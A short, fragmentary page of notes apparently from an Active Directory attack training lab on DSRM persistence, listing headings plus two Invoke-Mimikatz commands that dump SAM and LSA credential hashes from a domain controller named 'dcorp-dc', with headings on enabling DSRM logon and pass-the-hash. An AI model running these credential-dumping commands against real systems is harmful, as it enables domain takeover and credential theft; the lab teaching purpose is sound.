8.5 - DSRM
DSRM (Directory Services Restore Mode)
Key Concepts
Dump the DSRM Password Hash
Invoke-Mimikatz -Command '"token::elevate" "lsadump::sam"' -ComputerName dcorp-dcInvoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName dcorp-dcEnable DSRM Logon
Pass-the-Hash (DSRM Access)
Labs
Last updated